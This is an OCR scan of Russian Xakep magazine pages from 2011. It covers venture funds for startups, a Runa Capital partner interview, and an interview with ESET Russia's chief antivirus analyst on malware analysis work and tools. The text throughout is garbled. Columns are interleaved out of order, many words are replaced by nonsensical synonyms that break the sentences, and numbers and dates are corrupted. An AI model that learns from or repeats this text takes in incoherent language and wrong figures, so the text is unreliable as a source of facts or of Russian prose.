них: ЭстерДайсон, ведущий правп ения

НасkDаупозиционируютсвоифестивалиименно

высокотехнологичных стартап-проектов, обще­

так. Кстати,

Ha ckDay проводятся сверху самые сверху раз­
ные тематики, сие далеко не лишь IT, да равно кино, симфоджаз ,

ния потенциальных предпринимателей равно людей,

EDventures Holdings, МортенЛунд !инвестор
Skype), Стефан Глянце р , вкладчик last.fm, Реш м а

которым увлекательно сидеть во стартап-проектах .

Сахони !основатель SeedCamp-oднoro изо самых

клипмейк, компьютерные игры, занимательная

Основная задача-формирование нового поколе­

больших бизнес-инкубаторов Европы) , Саныч

харьковская область да современное живопись . И проис ходит

ния предпринимателей , готовых инвентаризировать равным образом исходить

Галицкий ,

сие баста часто.

в сознанный опасность .

ABR

Almaz Partn ers, Колюня Митюшин,

равно круглым счетом далее.

Важными участниками любых стартаперских тусовок являются

позволено внести деньги, почерпнуть вслед сие его определенную долю. На

частные инвесторы, а в свою очередь инвестиционные фонды. И тех равным образом других

территории России равным образом стран СНГ теперь работает целостный шпалеры крупных

объединяетодно-желание выискать высокоперспективный проект, на кой

венчурных организаций. Ниже-лишь многие с них .

Фонд Microsoft

Главстарт

ABRTVenture Fund

Сайт: ms-start.ru

Сайт: glavstaгt гu

Сайт: а bгtfund.com/гus

Тип фонда : грантового финансирования

Тип фонда : венчурный

Тип фонда : вечнурный

Дельта грантов : от$30до $100 твоя милость с.

Дельта инвестиций: накануне $100 твоя милость из .

Дельта инвестиций: через $1 прежде 0 млн

на

Эадача Глав старта

Фондсозданвконце

0010годакомпанией

Microsoft на России.
Направл ениео ч ень

~ ГЛАВСТАРТ

четкое-оказание

00

Фондсоздан Андреем

-величение потока

Барановым равно Ратмиром

новых интернет-

Тимашевым, основа­

проектов, интересных

т е лями

для того инвесторов. Для

которая известна тем,

Aelita Software,

nрямой финансовой поддержки российским

этог~вчастност~проводитсямероприятия

который была продана на марте 0004 г. калифо рнийской

стартапам на области прогр аммнаго обеспечения

«Sta rtup Weekend>> равно <<Венчу рный шайба аунтер>>.

да интернет-услуг. При этом этотфонд осязаемо

Это сильнее нежели венчурный фонд. а бражка го-

выделяется в фоне остальных. Дело на том,

това проинвестировать на проекты бери стадии идеи

корпорации Quest Software следовать $115 млн. Продажа
Aelita Software стала одной изо самых крупных
сделок получи российском софтверном рынке. ABRT

в чем дело? некто предоставляет российским ста р тапам

иначе прототипа, которым в целях доведения впредь до стадии

малограмотный является институциональным да малограмотный работает

безвыгодный инвестиции, а гранты, т. е. начисто

готового продукта требуетеяда

вместе с пайщиками. Фонд инвестируетсредства своих

безвозмездное финансирование, неграмотный требующее

$100тыс. Рассматриваются nроекты, имеющие

основателей, а вдобавок деньги команды. Кроме

возврата сре дств. За п ервые полг стихотворение работы

хорошие п ерспективы роста, -в первую очередность

того,

фондабылорассмотренопорядка150заявок

в области размеру аудитории. Боле е того, Глав отправная точка

зарубежными фондами со значительным опытом да

различных старта пав, с них подд ержку

является венчурным nартнером Российской вен­

получили еще высшая оценка начинающих компаний.

чурной компании, а в свою очередь первым официальным

портфелем комок обращение й. Это европейские IMangrove
Capital Partп ers) да американские llпsightVenture
Partners равным образом OpenViewVenture Partners) партнеры­

02 месяцев равно накануне

ABRP работаете крупными, известными

Размеры выданных грантов варьируются от$30

партнером

предварительно $100тыс. Например, $100тыс. возьми эволюция

ванвпоявленииновыхнеигровыхnриложений

бизнеса получил пермский расчёт

чтобы социальных сетей равно вообще не без; ро ссийским

которыхимеет подуправлениемболее$100млн .

разрабатывающий приговор до борьбе из

представительством

ABRT помогает предпринимателям основывать со­

nиратетвам на интернете.

разработчикамсоциальныхприложений.

ХАКЕР

00/153/2011

PiratePay,

Facebook во Рос сии. Фондзаинтересо­

Facebook соглашаться п омо преграда

соинвесторы, венчурные фонды, и оный и другой изо

фтверные компании мирового уровня.

091

СЦЕНА

каковой преждевременно или — или время идти на покой лопнет. У команды достоит
бытовать пониманиеуникальности продукта итого, вроде
их идеяложится получай современныетренды. Не нужно
приплестись со проектом нового

Facebook alias Google,

на в таком случае времена равно как существуетогромное величина
новых, неразвитыхниш да нерешенныхзадач.

r.t

ВНЕКОТОРОМ РОДЕ ПРОДОЛЖЕНИЕ

. . . ПРЕДЫДУЩЕГО ВОПРОСА: НА ЧТО БЫ
ВЫ ПОСОВЕТОВАЛИ ОРИЕНТИРОВАТЬСЯ

СТАРТАП ЕРАМ? БЫТЬ МОЖЕТ, В КАКОЙ-ТО
ОБЛАСТИ НАБЛЮДАЕТСЯ НЕХВАТКА

СВЕЖИХ ИДЕЙ И МОЛОДЫХ ПРОЕКТОВ,
БЫТЬ МОЖЕТ, В КАКИХ-ТО НИШАХНЕМНОГО

<<СВОБОДНЕЕ>>, ЧЕМ В ДРУГИХ?

n

Мы смотрим в три манатки -технологию,

081

команду равно планы на будущее рынка. Если насчет е кт

сильнее ранней стадии, автор придаем большое
значимость технологии.

Ориентируйтесьнапотребности,проблемы
клиентов, находите новые ниши, делайте детище
со очевидным конкурентным преимуществом во

еще существующих нишах. Не нужно порываться

основать 085-й «Групон>>. Для нас важна ваша
мания для качестве продукта. Четко

понимайте, какую насущную проблему пользова­
телей возлюбленный решает.

Например, наша портфельная команда

Jelastic пошла по части этому пути, создавтехнологию
дляразработчиковJаvа-приложений,которая
поддерживаетразвертываниестандартныхJаvа­

приложенийбезограниченияпоиспользованию
библиотек равно привязки ко дорогостоящему ПО кон­

кретного поставщика облачныхуслуг ISaaSI.
Сейчас получи и распишись российском IТ-рынке, во-первых,
внушительный неполадки во сторону потребительского
рынка. Во-вторых, легко развит Ь2Ь-сектор.

В вывод этой статьи предоставим дисфемизм экспертам, людям,

которые работают со стартапами каждый день равным образом безграмотный молва
знакомы из реалиями российской стартап-сцены. На мои вопросы
уважительно согласился огрызнуться Андрон Близнюк, нераздельно изо партнеров

венчурного фонда Runa Capital ( гunacap . com l.

В третьих, у команд далеко не отбою нет глобальных
амбиций, то и дело программа является копиро­
ванием сервисов, которые «выстрелили>> возьми

западном рынке. В конечном итоге всё сводится
ко недостатку сложных технологий, ведь, по мнению сути,

сложная методика да диапазон амбиций про­
екта -две стороны одной медали.

r.t

КАКОВАСРЕДНЯЯДЕЛЫАПО

. . . ИНВЕСТИЦИЯМ В ПРОЕКТ ДЛЯ РОССИИ

r,1

РАССКАЖИТЕ, ПОЖАЛУЙСТА, КАКИЕ

r.t

И СНГ? НАПРИМЕР,$50-100К, БОЛЬШЕ ИЛИ
КАКОВЫ В ЦЕЛОМ ТРЕНДЫ

МЕНЬШЕ? ЧЕМ ЭТО ОБУСЛОВЛЕНО?

. . . ТРЕБОВАНИЯ ВАШ ФОНД ПРЕДЪЯВ­

. . . ПОСЛЕДНИХЛЕТ?ВСТОРОНУКАКИХ

ЛЯЕТ К СТАРТАПАМ И ЧЕГО ВЫ ОЖИДАЕТЕ

ТЕХНОЛОГИЙ, УСЛУГ И ОБЛАСТЕЙ СЕЙЧАС

ОТ КОМАНД В ПЕРВУЮ ОЧЕРЕДЬ?

СМОТРЯТ СТАРТАПЕРЫ?ТАКЖЕ ИНТЕРЕСНО,

081

n

НА ЧТО В ЭТОМ ВОПРОСЕ ОРИЕНТИРУЕТСЯ

обусловлено тем, почто ты да я ориентируемся заранее

ФОНД, ЧТО ПРЕДПОЧТИТЕЛЬНЕЕДЛЯ ВАС?

081

Прежде общем нас интересуюттехнологи-

ческий равно мыслящий компоненты

проекта,уникальностьпродукта,стремление

n

n

Для Runa Capital буква низовье ото $500 твоя милость с.

донесколькихмиллионов,иэто

лишь получи проекты ранней стадии. Но сие далеко не
значит, сколько автор в ультимативной форме безграмотный рассматрива­

Если бросать что касается консьюмерском рынке-зто

ем проекты, выходящие ради сии рамки. В них ты да я

social, local, moЬile, ежели что касается рынкетехноло­

можем вложиться вкупе со другими

команды освободить его бери межнациональный рынок,

081

глобальные амбиции, подкрепленные соответ­

гий-зто четко облачные технологии,

инвесторами -у нас большая невод партнеров

ствующим пониманием стратегии развития

распределенные вычисления.

на правах на России, круглым счетом равно вслед за рубежом.

проекта. Мы помогаем нашим портфельным

Приэтомтрендомможноназватьипоявление

компаниям не без; выстраиванием бизнес-стратегии,

новых бизнес-моделей, равным образом способов продвижения

партнерами да клиентами- доработкой

традиционныхсервисов. Тем безвыгодный больше ваш покорнейший слуга бы безвыгодный реко­

r.t

ПОЖАЛУЙСТА, РАССКАЖИТЕ О

. . . НАИБОЛЕЕУСПЕШНЫХПРИМЕРАХ

технологии, поиском подходящих сотрудников.

мендовалстартаперамслепоориентироватьсяна

ИНВЕСТИЦИЙ ВАШЕГО ФОНДА. ТАКЖЕ

Но вперед у команды повинен фигурировать

тренды равно тем больше слаживаться сокращать совершенно этитрен­

БЫЛО БЫ ИНТЕРЕСНОУЗНАТЬ ВАШЕ

продукт, вкруг которого выстраивается

ды вместе. Раздутыйтрендэто перенасыщенный

МНЕНИЕ И О САМЫХУСПЕШНЫХ СТАРТАПАХ

компания.

предложением ярмарка илидаже вздутый пузырь,

НАШЕЙ ГЕОЗОНЫ В ЦЕЛОМ.

092

ХАКЕР

00/153/2011

Стартапы, денюжка равно достижение

n

На текущий моментпортфельные компании

081

Ruпa Capital получай инвестиционной стадии.

Объявлены капиталовложения во следующие проекты:

Telefir (telefiг. гu )- мобильная голосовая
социально-коммуникационная платформа. Это

своего рода наш. русский голосовой Twitteг. У
сего приложения поуже без дальних слов несколькодесятков

тысяч пользователей . Чаще итого людишки пользуют­
ся им во пробках , от времени до времени простодля того, дай тебе
потереться равно познакомиться. Сервис систематически
нащупал свою аудиторию, равным образом симпатия растет.

Примерпер не без; пективноготехнологическогопро­

дукта-Jеlаstiс ( hivext . гu ) , сие первая отечествен­
наякоммерческаяРааS-систем~предназнач е н­
наядляразработкиJаvа-приложенийвинтернете

без участия необходимости доносить адрес во структуре
сайтов. Осеньюон по-черному запускается на США да
Европе, нате Россию должно всего 0% их рынка .
Metabar ( metabaг.гu )- коренной на России

дизайнер тупбаров пользу кого владельцев сайтов
да обычных пользователей. Их сервисом поуже
без дальних слов пользуются порталы крупнейших рос­

сийских СМИ-<(Ведомостей >> , « Российской
газеты >>, КП да др.

Портал Travelmenu (tгavelmenu . гu ) сие наша
совместная вкладывание со фондом

Almaz Capital.

Staгtup Point на Ростове

n

081

Мы видим веселей обратную ситуацию. Пока

во Россиилюди чаще хотятполучитьчужие

деньги, по существу далеко не вложив на вариант ни

Он входите ТОПЗ онлайновыхтуристических

времени, ни каких-либодругих ресурсов. Поэтому

агентств на России равно держи Украине, из ним работают

коли ко нам приходяте проектом, тот или иной люд

сильнее нежели 090тыс. отелей, 000туроператоров равно

развивали для домашние деньги, это, безусловно,

000 авиакомпаний. Все проекты на активной фазе

немалый достоинство во глазах инвестора. Но, ко сожале­

своего развития, экзиты будутпоэже.

нию, доколе в такой мере иногда нечасто.

Если но балакать абуспешных стартапах по­

r.1

И ПОСЛЕДНЕЕ . НА ВАШ ВЗГЛЯД, СТОИТ

. . . ЛИ СТАРТАПЕРАМ ПРИНИМАТЬ
УЧАСТИЕ В МНОГОЧИСЛЕННЫХ И РАЗНО­
ОБРАЗНЫХМЕРОПРИЯТИЯХ ВРОДЕ STARTUP
WEEKEND, STARTUP POINT, SUMIT, НАСКОдУ И

Т. Д.? МОЖЕТ ЛИ ВСЁ ЭТО БЫТЬ ПОЛЕЗНЫМ
ИЛИ ЯВЛЯЕТСЯ ПУСТОЙТРАТОЙ ВРЕМЕНИ?

n

Безусловно, такие мероприятия дают

стартаперам некто опыт, развивают

r.1

081

поддержку, ахнуть невыгодный успеешь развивающихся равным образом ранее заслу­

ЕСТЬ ЛИ ИНТЕРЕС К РОССИЙСКОМУ IT
. . . НАЗАПАДЕ?ГОТОВЫЛИВНАС

живших международное признание, сие до

ИНВЕСТИРОВАТЬ , НЕ БОЯТСЯ ЛИ? БЫТЬ

становятся площадкой про знакомства не без;

лишь зрелище Alawaг да видеосервисы

МОЖЕТ, ЗАПАД ПРЕДПОЧИТАЕТ « ПЕРЕКУ­

инвестором равным образом будущими бизнес-партнерами. Но

был куплен у фонда

ПАТЬ >> У НАС ЛУЧШИЕ МОЗГИ, НО НЕ

непостоянно ни на единственный иэ проектов, представленных нате

(Эа $150 млн.- При м. Mifгill).

ВКЛАДЫВАТЬСЯ В ИХ РАЗВИТИЕ ЗДЕСЬ?

сих площадках , ты да я безграмотный проинвестировали.

r.1

n

Безусловно, прибыль есть, ярким тому

возможностей, на того так чтобы продвигать особенный

подтверждением является то, что-то большая
Runa Capital- междуна­

следнего времени, получившихинвестиционную

Qik. Последний
Almaz Capital компанией Skype

КАК ВЫ СЧИТАЕТЕ, ЧЕМ ОБУСЛОВ­

предпринимательскую культуру равно часом

Стартаперы должны пускать в ход высшая точка

. . . ЛЕНОНЕКОТОРОЕНЕДОВЕРИЕИ

081

ДАЖЕ ОПАСКА, С КОТОРОЙ НАШИ

порцион инвесторовфонда

своим nродуктом не в шутку , остается архи немножко

СТАРТАПЕРЫ ДО СИХ ПОР ОТНОСЯТСЯ К

родные. Кроме того, убирать цепь примеров успешного

времени бери такие, пустьдаже равно ахти полезные,

ИНВЕСТИЦИЯМ ПРАКТИЧЕСКИ ЛЮБОГО

раэвитиякомnанийроссийскогопроисхождения

мероприятия. Есть люди, назовем их «профес­

РОДА?УВЫ,МНОГОЧИСЛЕННЫЕОПРОСЫ

в международных рынках: Paгallels, Acгonis,

сиональные стартаперы>>, которые ходят под

проект, но, по образу правило, утех, ктозанимается

ПОКАЗЫВАЮТ, ЧТОЛЮДИ СКОРЕЕ

АЬЬу, Kaspeгsky. Они создаютотличные продукты,

для каждуютакую тусовку, периодично пере­

СКЛОННЫ РАЗВИВАТЬ ПРОЕКТ, ВКЛАДЫ­

имногиеизни хпр ивлеклизападныеинвестиции.

ставляютслайды во nрезентации, раздаютсотни

ВАЯ В НЕГО «СВОИ КРОВНЫЕ>>, НЕЖЕЛИ

Также кушать истории Mail.гu да Уапdех от успешным

визиток ... К ним у инвестора возникает оправданный

ОБРАЩАЯСЬ К ИНВЕСТОРАМ.

IPO получи западных биржах .

альтернатива : а остается ли эпоха нате самоуправно проект?::J:

Startup Weekend

ХАКЕР

0О /153/2011

Эти nозитивньоелюди со фикусом ждуттебя бери Startup Week на Вене

093

СЦЕНА/ИНТЕРВЬЮ

ХАКЕР

00/153/2011

Интервью из главным антивирусным аналитиком

Eset/Russia

АЛЕКСАНДР
МАТРОСОВ

ИНТЕРВЬЮ С ГЛАВНЫМ
АНТИВИРУСНЫМ

АНАЛИТИКОМ

ESET/RUSSIA

В тусовке людей, занимающихся инфор­

r.1

MAN
С ЧЕГО ИЗНАЧАЛЬНОУТЕБЯ П ОЯВИЛСЯ

мационной безопасностью, рабочая сила

. . . ИНТЕРЕС КАНТИВИРУС НО Й ДЕЯТЕЛЬНО­

антивирусных компаний всякий раз вызы­

ВСЕ С ОБРАТНОЙ ИНЖЕНЕРИИ, НО КАК ТЫ К НЕЙ

СТИ? Н УТО ЕСТЬ ПОНЯТНО, ЧТО НАЧИНАЛОСЬ

вают великоватый процент . Всем интерес­

ПРИШЕЛ? ЧТО ТЕБЯ ПОБ УДИЛО ?

а прознать в рассуждении внутренней антивирусной

n

кухне, что касается том, отколе они берут образцы
малвари да в качестве кого то-то и есть их анализируют.

Ну равным образом конечно, старый вопрос-«Если
пишущий эти строки сильный вирмейкер, вам меня возьмете

081

Начн у, пожалуй, издалека. По первому

образованию аз многогрешный конструктор - системотехник, равным образом

в среднем вместе с

0998 лета ваш покорнейший слуга сытно подсел получи и распишись да зу чение

ра не без; пр остраненныхмикроконтроллеровтого времени .

Самым популярным моим испытуемым был КР580

!советский аналог8-битного процессора 00801 поскольку
от воей дешевизны да дос ту пности . Естест венно, эт в рассуждении

получи работу?» Все сии вопросы да мы не без; тобой задали

увлечениеподразумевалознание ассемблера равно

руководителю российского вирлаба

опытность его готовить. В оный а периодпоявился прибыль

ESET.

для т еме информационной безопасности , же тем временем безвыгодный
былотакого обилия литературы, в духе оный ча с, да

возле хо дил осьсобиратьинформацию просто в области
крупицам . Нав е рное, самой ценной находкой про меня
держи тотмоментстал

<< Вседля хакера

CD-ROM от интригующим названием

N2 03>>, какой-никакой был найден в

развалах царицынекого ра ди орынка. И з залежей
информации нате нем пишущий эти строки узнал бездна интересного, а
главное, обнаружил программу из интригующим

ХАКЕР

00 / 053/2011

095

СЦЕНА/ ИНТЕРВЬЮ

названием WinNuke, которая, в области заве р е ниям

н ахо ди тся потусторону барр икад, н что до обобщенно ни е

NDА.Людей на России у нас безвыгодный т ак мно г о, во вкусе у наших

авторов, низменность жна бы ла выполнять DoS всех

бы л в рассуждении тольк что до виртуальным, а ц ели так от сиречь

конкуренто~ноихквалификацияпозволяетнам

полярны х версий винды. И возлюбленная таки работала, но,

разведочный ха р ак тер . Что касается

решатьочень не без; л ожные ради дачи . Это, собс тв ен но, да

за вычетом по отношению 14 са ния , вроде ею поль зова ть ся, у меня малограмотный

уровн автор этих строк знаний, т о, наравне равным образом везде, симпатия си льн насчёт

зада л насчёт столетие тор развития да расширения н аше г касательно

было потому что льше ничег о. И тем временем н е льзя б ыло направляться да

однова нит ся равно зависи т самотеком ото

вирлаба: автор сих строк малограмотный берем ко себя ах кого, а ищем

без труда вместе с пр оси ть у гу гл а интересующуютебя

конкретного чел овека . Но клеймящий в области тем у гр озам,

нас т оя щишки х увлечен ны х пр офессио н а л ов . А путем

информацию, ага да интернет-доступа у меня в оный

ко т орые появляются п относительно р ой из-под их для лави а т ур,

д есять лет, моя особа н а д еюсь, нам удастся, получай ко н ец,

время п ос тоя нн относительно го н е было . П оэтому нато м но

таки х как, наприм ер TLD З/4, Rovnix, соверше нн в рассуждении

сформироватьnол н остью группуанализасложных

диске был найден инструментарийдля р еверси н ­

по части основание знач н касательно никак не игра стоит свеч н едооценивать э ти х л ю д ей.

угроз, т ак по образу теперь оче н ь никак не легко не без; квалифи ц и­

г а, и, во ооружив ши сь им, моя особа возьми малограмотный почем нед ел ь

Вы сококвалифици р ован ны е от п е ци а ли сты глотать

рованными ка др ами во эт ой обл асти.

погрузилсявновую,неизведаннуюранее

равным образом вместе с р е ди участ ни заговор блекхат-сообщества, почто

предметную обла сть. Но после сии двум недели пишущий эти строки н е

прежде став ля е т нам изрядно хло п в рассуждении т да п обуж д ае т для

д оби л ся побег п е шн по части го резул ьтат а, приближенно в качестве кого сове рш ен ­

д а льн ей ш ему самосове рш енство во а нию.

r.1
a.l

ХО ТЯ БЫ В ОБЩИХ СЛОВАХ: КАК В

ESET

СОБИРАЮТ ОБРАЗЦЫ МАЛ ВАРИ?

КАКИЕПРОПОРЦИИМЕЖДУИСТОЧНИКАМИ

хотя неграмотный б ыл наслышан из nрогр аммированием почти

по части п драчун ционны е систем ы Windows да тем паче от

r.1
a.l

СЛЕДИШЬЛИТЫ ЗАВИРУСАМИ НА

ОБРАЗЦОВ?

пена у ги во отход н ом а нали зе отложит ь равно н ача ть

ЧЕРНОМ РЫНКЕ? ПРОДАЕТСЯ ЛИ
ЧТО-ТО ДЕЙСТВИТЕЛЬНО ИНТЕРЕСНОЕ С

черnать недос тающ ие з нан ия. Это заня л по части какое-то

ТОЧКИЗРЕНИЯАНТИВИР УС Н О ГО

W

время, хотя на итоге автор дезоксикортикостерон спа л ся прежде истины, да

АНАЛИТИКАИЛИ ВСЕ В ПРИ ВАТЕ?

знаю. Н ачи н ая с самих пользователей, которые

n

сис т емами сбора со однова ны х вредоносных

разработкой сетевых приложе ни й . Пришл шпиндель мои

результатом работы стал впахивающий РоС держи

perl .

Сам пр в рассуждении ц ессменя н искусник лишь захва тил ,ч т оя согласен а

n

Р я ны х источ ник ов у нас в сущности

много, равным образом ваш покорный слуга даже, наверное, об всех равным образом невыгодный

возле от ыл ают нам сэм плы , равно заканчивая активными

Иногда удочка ется n в рассуждении л у читьдос туn ко интерес­

забы л пр по отношению компьютерные зрелище да в скором времени напр насчёт л ет

W

изучал неизведанное. Потом уже, н а первых

там, идеже естьчто-т что касается д ейст вите льн по части интересное,

такжеобмениваютсяобразцамиугро~таккак

курсах МИФИ, у меня п оявился прибыль ко изучению

дост у nтолько на нешироко го круга лиц . У возьми от очищать

э ведь неграмотный является какой-то составляющей

вредоносных пр ограмм, приблизительно наравне моя особа выбрал сие

небольшо й отдел, во задачи которого на ходит

коммерческой тайны. Сейчас, закачаешься времена, эпизодически во

направлениедлясвоихнаучныхизысканий,а

мониторингактивностикиберкриминальныхгрупп

теч е ни ечасао ди нито т жетроянможетбыть

да й информации сверху закрытых форумах, н касательно

ресурсов. Антивирусные комок п ании в среде из себя

выбрано в отношении н относительно было п в отношении кри терию, чтоб ревер си нга

да да х производитель ности. В их вслед дачи на хо дит п оиск

п ере nакован н еско ль ко раз, насчёт дним для стым

было хлеще , нежели лишь остального. Н у равным образом во итоге

в особенности акти вны х сплоит-паков, возьми бл ю д е ни е следовать

сижок нат у рным обна р ужением н е обойтись.

п олучает ся, что-нибудь побудил меня ко во семуэт ому

самыми крупными партнерами, разработка ющими в соответствии с

WinNuke, следовать в чем дело? его ав ископаемый м отд е льн ое вместе с жете сибо.

схемам PPI . Н касательно зачас тую закрытые сообщес тва

r.1
a.l

ДОЛЖЕН ЛИ ВИРУСНЫЙАНАЛИТИК
СЕРЬЕЗНО ПРОГРАММИРОВАТЬ ИЛИ В

ЭТОМ НЕТ НЕОБ Х ОДИМОСТИ?

n

Тут не без; н ача ла надоотделить пр касательно граммн ую

W

инженерию во вкусе пр в отношении цесс да з нание языков

r.1

КАКИЕ ИНСТ__РУМЕНТЫ ТЫ ИСПОЛЬЗ У­

ста р аются бы т ьочень осторож ным равным образом равно ко р ай н е

а.l ЕШЬВ СВО ЕИРАБОТЕ?ЕСТЬЛИ У ВАС В

н астороженно в отношении тно ся т ся ко новым участ ник ам.

КОМПАНИИ КАКОЙ-ТОУТВЕРЖДЕННЫЙ
НАБОР ПРОГРАММ И У ТИЛИТ ?

r.1
a.l

ПРАВИЛЬНОЛИ Я ПОНИМАЮ , ЧТО

СОЗДАНИЕ ВИРУС НОЙ ЛАБОРАТОРИИ
ESET В РОССИ И- ЭТОИНИЦИАТИВА LETA
GROUP,AHE ГЛОБАЛЬНОГО ЕSЕТ? ВООБЩЕ

n

W

Ядумаю,здесьАмерикунидлякогоне

открою. а нтивирусные комок пании исnользуют

очень пр одукты с Hex-Rays. Н уа разве серьезно, в таком случае

прогр аммирова ния да теори да колтун пилят по отношению ямища . Д ело

НАСКОЛЬКО У ВАСТЕСНОЕВ ЗА ИМОДЕЙ ­

список, конеч однако , есть, а симпатия скоренько со д ела ндля

втом,чтопониманиетог~какработаеткомпиля­

СТВИЕ С ГЛОБАЛЬНЫМ

холм н акомительных целей, равно кажинный может

тортого сиречь иного яз ык а пр по отношению гра мми р ова ния да л равным образом

платформы , б ыва ет пр ос так необходимо. Конечно,

n

ESET"OM?

использоватьтот инструментарий, какой ему

Это куда распространенное заблуждение,

болееудобен дляп ос т авле нн ойза д ачи.К р оме iD А

которое, п по отношению всей видимости, бы л относительно сформи ­

Ргоссамогопервогосвоегознакомствас

э в таком случае н е вал н а ч ае т, в чем дело? люди, анализирующие

W

тр касательно янц е вдля JME, являются экс п ер тами п что касается

р ова н онашимиконкурентами к со ни но ни автор этих строк

т что касается н кос тям языка Java. Также во ра боте наших

из татуса равным образом з н ачимости отечественный ей лаборатории. На

пустить в ход ре дакто р

вирусных ана литик что касается во закачаешься з ни кает бесчисленно во е ще й,

самом д е л е с начальн что до начинание исходила через

ранее стал п рос т онезаменим по вине ско пивш егася

связа нны хса вт ома т иза ци ей пр оцессаобра тного

р оссийско го пр е дстави т е л ьства, идеже хотели

количес тв а собс тв енных плагин об во . Из прекрасно а дч иков

анализа, гд е, безус ловн о, нужно кто наделен ваша милость сокий

ул уч ш ить качес тв по отношению обнаружения локальных угроз.

предпочитаю lmmunity D ebugge rз a его т йес н ую

у яр е нь квал ифик а ции во области программир насчёт ­

Но во Брат ис л аве п ри н яли приговор об напрямую м

интеграцию от

во ания. Сейчас сам по себе ый модный шлепалка пр ограм­

подчинении сам им, да наша

исс л е дова н ия ядра, в таком случае вам краснолесье д остат оч н об

мироздание что касается вания нашей л або рат ории сие Pytho n, круглым счетом что

лабораторияявляетсяодним с п одразделений

аскетичен, равно симпатия паль получи и распишись WinDbg [для н его, кстат и,

дьявол на ст р ое н малограмотный т касательно льк касательно на n уб личные инструменты, н касательно

ос н овно го вирлаба. У насуже су щ ест на уетм н об го

как и есть ть своя Руthоn-надстройка pykdl . Но п орой

да на наши внутренние. Изучить е го отнюдь не вместе с ло ж н о, да

усик п е шны х пр имеров в рассуждении т кр ыти пишущий эти строки удал ен ны х

бываетудобно использоватьстарыйдобрый Sof lce,

в некоторых случаях онэкономи тмноговр еме нидляр е ш е ни ваш покорный слуга

лабораторий, нынешний ч акробат воздуха да невыгодно отличается от в большинстве случаев п ваш покорный слуга ти: на Праге,

который-нибудь на свое пора стал моим проводником во мiровая

вслед за д а ч автоматизации по части вместе с р ав н е нию , наприм е р , вместе с

К р акове, Монреале, Сан-Диего, Бузнос-Айресе да

ядра NT. Для со р ав н ения кодадвух исполняемых

инструментами противоположно го анализа прод ол жаю

Hiew, которыйдля меня

Pytho n иудобноеАРI. Чт что касается касается

тем а С++ . Хотя С, С++ не без; тоят у нас возьми втором месте

Кошице. У нас оче ньдружный коллек тив , да д аже

файлов равным образом п атч-ана л иза счи та юлучшим инструмен­

no

чуна л енно стало быть соде р жательное об щ е ни е умереть и отнюдь не встать

т ом Zynam ics BinDiff. Н уа нашел ли нужно ночь равно об суп е

поn ульяна рно сти, в такой мере на правах дал еко далеко не по сию пору вслед дачи

мо"жно урегулировать сре д не без; твами Python. Так чт что касается

внутреннихрассылках равно ко нф еренци автор х.

н еобхо квартал ос ть на сии х знаниях, безус ловн о, есть ть, да
симпатия критична на пр по отношению цессе рекрутинг а сотрудников ко нам .

r.1
a.l

ПРИ ХОДИЛОСЬЛИ ТЕБЕ ОБЩАТЬСЯ ПО

r.1
a.l

КАКИЕ ЗАДАЧИ СТОЯТ ПЕРЕД

РОССИЙСКИМ ВИРЛАБОМ ? КАКАЯ

СТРУКТУРА У ЛАБОРАТОРИИ , СКОЛЬКО

РАБОТЕСБЛЕКХАТАМИ?КАКТЫ
ОЦЕНИВАЕШЬ УРОВЕНЬЛЮДЕЙ, КОТОРЫЕ

ЛЮДЕЙ РАБОТАЕТ ? КАК ТЫ ВИДИШЬ
РОССИЙСКИЙ ВИРЛАБ ESET ЧЕРЕЗ

СОЗДАЮТ МАЛ ВАРЬ?

ДЕСЯТЬ ЛЕТ?

n

W
096

Общаться приходилось со разными

людьми,втомчислеистеми,кто

кодовые паттер ны возьми больш ом количестве файлов,
тоунасимеютсяварсеналеспециальные

n

W

внутренние инструменты про э ти х целей. Е стьеще
гора сумме внутреннего равно секре тн ого, зачем

в рассуждении 14 сывать бери паблик автор этих строк без затей далеко не мо гу.

r.1
a.l

ВН УТ РИ КОМПАНИИ НАВЕРНЯКА

ЕСТЬКАКИЕ-ТО ВН УТРЕННИЕ

ИНСТР УК ЦИИ И МЕТОДОЛОГИИ ПО
П ожа л уй, н а э тотвопр ос пишущий эти строки касательно тв е ч у ук л ончиво,

АНАЛИЗУ МАЛ ВАРИ. ЧТО ОНИ СОБОЙ

таково какответы держи него попадают уж п что до д

ПРИМЕРНО ПРЕДСТА ВЛЯЮТ ?

ХАКЕР

00 / 053/2011

Интервью из главным антивирусным аналитиком

0rW

Eset/Russia

Общи х инструкций безвыгодный в такой мере ужак равно много, приблизительно

ЛИ КАКИМ-ТО ОБРАЗОМ ВОЗМОЖНОЕ

ПЕРЕМАНИВАЕТЕЛИСОТРУДНИКОВ?ЕСТЬ

~ кактутможнохотьдеся тьра з п еречиты­

БЛЕК ХАТНО Е ПРОШЛОЕ КАНДИДАТА?

ЛИ СОТРУДНИЧЕСТВО И СОВМЕСТНЫЕ

вать, так временно самоуправно руками н е попроб бакс шь-ничего
безграмотный короче паркет уча ть ся . Е сть глобальная

Wiki, идеже

n

ПРОЕКТЫ?
Н е п осредственно ко нам ЛЮДИ набираются

размещаются другие путевые заметки сообразно

~ п об результатам решения тестового задания

больше всего сложным вредоносным проект м,

во виде крякми. П ос летого в духе кандидатура прошел

~ стараемся набирать ко себя людей , которые

методам распаковки протекторов, ал г оритмы

большую делянка уровней, а лучше-все, дьявол полагается

впереди никак не были работниками др угих антивирусных

шифрования трафика ботнетов да полезные

предоставитьразвернутоеописаниепроцесса

компаний. На сие убирать бездна причин, одна и,

скрипты. Кстати , пр что до шлой по осени вышла ужас

прохождения . По сле верификации солюшена в

наверно е, самая главная, в некоторых случаях ко нам приходит

равноценность удачный ждущий приглашается

соискатель не без; многолетним опытом на антивирусной

интересах начинающих, наш брат ее энергично используем на

в очное собесе дование, на рамках которого равно

индустрии из ранее сложившейся точкой зре ния нате

процессеподготовкикадров

решается егодальнейшая судьба. Были равно

многие вещи, так буква след зрения находится во

полезная книжица "Malwa гe

r.t

Analyst"s Cookbook"

ЕСЛИ РИСОВАТЬДИАГРАММУТВОЕГО

lrW

Борьба вслед кадры, безуслов но, ест ь, хотя автор

забавныеслучаи : впроцессенайманаходились

контексте его предыдущей работы. Очень по-китайски

умельцы, пропатчившие графичный интерфейс

таких людей пер еубедить, они пытаются

0.;.1 РАБОЧЕГО ВРЕМЕНИ, ТО КАКИЕТАМ

так, с тем вдоль-поперек был положение << nройден >>, да

мучиться в соответствии с еще выработанным принципам равно

БУДУТ ГЛАВНЫЕ НАПРАВЛЕНИЯ И ПРОПОР­

утверждавшие абуспешном относительно хождении

привычкам, а у нас они др у гие . Что касается идей,

